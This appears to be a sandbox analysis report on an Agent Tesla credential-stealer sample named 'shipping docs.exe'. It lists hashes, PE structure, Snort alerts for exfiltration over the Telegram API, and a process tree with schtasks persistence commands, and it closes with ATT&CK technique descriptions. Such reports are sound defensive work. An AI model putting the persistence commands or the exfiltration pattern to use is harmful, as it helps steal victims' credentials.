SHA-512:	E03EAC82BF4174912D63CB8ECEED393320FE957F7A735FF0F720FBF558F9638E6FC051CB80607864CAAA8366CA0EDC2D44028367EF97D8020AD7B6F45EADDCD3
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 73%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@..................................N..W....`.. ............................................................................ ............... ..H............text........ ...0.................. ..`.rsrc... ....`.......2..............@..@.reloc...............@..............@..B.................N......H............U......4...X...(^..........................................z.(......}.....( ...o!...}......0...........{............3.....(.......................0...........{......,....f.........}......}......}.......s....o....}.......}....8......{....o....}......{....}......}.............}.....{........Y}.....{....-...+H.{........{....X.{....X .;.\|.{....Xa}......}.....{....o....:q....(....+..(........}.........(......................n..}.....{....,..{....o......{....*.s".

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.88879203859592
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	shipping docs.exe
File size:	606720
MD5:	6308ae755a893c15a989b1ccf2c56393
SHA1:	00ada70aa14a5cf26a7f8cecbaaa437267d30a2a
SHA256:	9dfdb5048599b1083fe534cf5fe5a0440d71eb74b5497e506f0a0a4c23821f40
SHA512:	e03eac82bf4174912d63cb8eceed393320fe957f7a735ff0f720fbf558f9638e6fc051cb80607864caaa8366ca0edc2d44028367ef97d8020ad7b6f45eaddcd3
SSDEEP:	12288:ks2kzrbETClbHskFgFwIyXCDl+s30ki9Pi00uSGD6DWzEH:1176ChskFgqIyXoi9Pi00uSTHH
TLSH:	D9D4023C224ABE2FC6BC99B958D296006FF1CD4D6110EF396EEE21D957CB3382741592
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....U.c.................0...........N... ...`....@.. ....................................@................................

File Icon


Icon Hash:	828282a28c323068

Static PE Info

General

Entrypoint:	0x494eee
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x638455A2 [Mon Nov 28 06:30:58 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x94e94	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x96000	0xc20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x98000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x92ef4	0x93000	False	0.8968630420918368	data	7.898839095668671	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x96000	0xc20	0xe00	False	0.5340401785714286	data	5.558555904519806	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x98000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x960e8	0x7a7	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_GROUP_ICON	0x96890	0x14	data
RT_VERSION	0x968a4	0x37c	data

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.3149.154.167.220496994432851779 11/29/22-21:19:34.793087	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49699	443	192.168.2.3	149.154.167.220
192.168.2.3149.154.167.220497004432851779 11/29/22-21:20:32.964256	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49700	443	192.168.2.3	149.154.167.220
192.168.2.3149.154.167.220497014432851779 11/29/22-21:20:48.592868	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49701	443	192.168.2.3	149.154.167.220

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 21:19:34.306422949 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.306468010 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.306538105 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.350533009 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.350590944 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.426537037 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.426740885 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.431344986 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.431368113 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.431643009 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.495279074 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.762609005 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.762672901 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.789762020 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.792854071 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.792897940 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.934180021 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.934380054 CET	443	49699	149.154.167.220	192.168.2.3
Nov 29, 2022 21:19:34.934495926 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:19:34.941884995 CET	49699	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.434153080 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.434236050 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:32.434340954 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.453962088 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.454035997 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:32.529711962 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:32.529877901 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.532382011 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.532432079 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:32.532835007 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:32.640913963 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.929069042 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.929147959 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:32.956907034 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:32.963989973 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:32.964052916 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:33.190849066 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:33.191063881 CET	443	49700	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:33.191247940 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:33.191715002 CET	49700	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:47.552496910 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:47.552612066 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:47.552792072 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:47.617912054 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:47.617959023 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:47.682044029 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:47.682136059 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:47.684530973 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:47.684552908 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:47.684855938 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:47.890943050 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:47.891128063 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:48.564800978 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:48.564868927 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:48.591984034 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:48.592714071 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:48.592767954 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:48.679336071 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:48.679500103 CET	443	49701	149.154.167.220	192.168.2.3
Nov 29, 2022 21:20:48.679678917 CET	49701	443	192.168.2.3	149.154.167.220
Nov 29, 2022 21:20:48.680298090 CET	49701	443	192.168.2.3	149.154.167.220

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 29, 2022 21:19:34.235759974 CET	49977	53	192.168.2.3	8.8.8.8
Nov 29, 2022 21:19:34.253768921 CET	53	49977	8.8.8.8	192.168.2.3
Nov 29, 2022 21:20:32.392975092 CET	57840	53	192.168.2.3	8.8.8.8
Nov 29, 2022 21:20:32.412163019 CET	53	57840	8.8.8.8	192.168.2.3
Nov 29, 2022 21:20:47.509844065 CET	57990	53	192.168.2.3	8.8.8.8
Nov 29, 2022 21:20:47.527040005 CET	53	57990	8.8.8.8	192.168.2.3

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Nov 29, 2022 21:19:34.235759974 CET	192.168.2.3	8.8.8.8	0x7d34	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 21:20:32.392975092 CET	192.168.2.3	8.8.8.8	0xd170	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Nov 29, 2022 21:20:47.509844065 CET	192.168.2.3	8.8.8.8	0x8851	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Nov 29, 2022 21:18:52.397281885 CET	8.8.8.8	192.168.2.3	0x741b	No error (0)	au.c-0001.c-msedge.net	c-0001.c-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Nov 29, 2022 21:18:52.397281885 CET	8.8.8.8	192.168.2.3	0x741b	No error (0)	c-0001.c-msedge.net		13.107.4.50	A (IP address)	IN (0x0001)	false
Nov 29, 2022 21:19:34.253768921 CET	8.8.8.8	192.168.2.3	0x7d34	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 29, 2022 21:20:32.412163019 CET	8.8.8.8	192.168.2.3	0xd170	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Nov 29, 2022 21:20:47.527040005 CET	8.8.8.8	192.168.2.3	0x8851	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.telegram.org

Target ID:	0
Start time:	21:18:57
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\shipping docs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\shipping docs.exe
Imagebase:	0x140000
File size:	606720 bytes
MD5 hash:	6308AE755A893C15A989B1CCF2C56393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Analysis Process: schtasks.exePID: 5248, Parent PID: 2400

General

Target ID:	1
Start time:	21:19:08
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp7934.tmp
Imagebase:	0xe0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 5220, Parent PID: 5248

General

Target ID:	2
Start time:	21:19:08
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: shipping docs.exePID: 3776, Parent PID: 2400

General

Target ID:	3
Start time:	21:19:09
Start date:	29/11/2022
Path:	C:\Users\user\Desktop\shipping docs.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xbb0000
File size:	606720 bytes
MD5 hash:	6308AE755A893C15A989B1CCF2C56393
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AgentTesla_d3ac2b2f, Description: unknown, Source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: yVGAJfiVEvtg.exePID: 4552, Parent PID: 1080

General

Target ID:	4
Start time:	21:19:09
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
Imagebase:	0x8f0000
File size:	606720 bytes
MD5 hash:	6308AE755A893C15A989B1CCF2C56393
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000004.00000002.365709519.0000000002CA7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 73%, ReversingLabs
Reputation:	low

Analysis Process: VMqTMMD.exePID: 1280, Parent PID: 3452

General

Target ID:	14
Start time:	21:19:26
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
Imagebase:	0x9a0000
File size:	606720 bytes
MD5 hash:	6308AE755A893C15A989B1CCF2C56393
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 0000000E.00000002.343723068.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 73%, ReversingLabs
Reputation:	low

Analysis Process: VMqTMMD.exePID: 3124, Parent PID: 3452

General

Target ID:	15
Start time:	21:19:36
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe"
Imagebase:	0x7f0000
File size:	606720 bytes
MD5 hash:	6308AE755A893C15A989B1CCF2C56393
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Reputation:	low

Analysis Process: schtasks.exePID: 4792, Parent PID: 4552

General

Target ID:	16
Start time:	21:19:41
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmpF5B7.tmp
Imagebase:	0xe0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 4536, Parent PID: 4792

General

Target ID:	17
Start time:	21:19:42
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: yVGAJfiVEvtg.exePID: 3680, Parent PID: 4552

General

Target ID:	18
Start time:	21:19:44
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0xaf0000
File size:	606720 bytes
MD5 hash:	6308AE755A893C15A989B1CCF2C56393
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Analysis Process: schtasks.exePID: 4184, Parent PID: 3124

General

Target ID:	19
Start time:	21:19:56
Start date:	29/11/2022
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yVGAJfiVEvtg" /XML "C:\Users\user\AppData\Local\Temp\tmp3418.tmp
Imagebase:	0xe0000
File size:	185856 bytes
MD5 hash:	15FF7D8324231381BAD48A052F85DF04
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: conhost.exePID: 4404, Parent PID: 4184

General

Target ID:	20
Start time:	21:19:57
Start date:	29/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff745070000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: VMqTMMD.exePID: 5228, Parent PID: 3124

General

Target ID:	21
Start time:	21:19:57
Start date:	29/11/2022
Path:	C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe
Wow64 process (32bit):	true
Commandline:	{path}
Imagebase:	0x9a0000
File size:	606720 bytes
MD5 hash:	6308AE755A893C15A989B1CCF2C56393
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security

Disassembly

⊘No disassembly

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
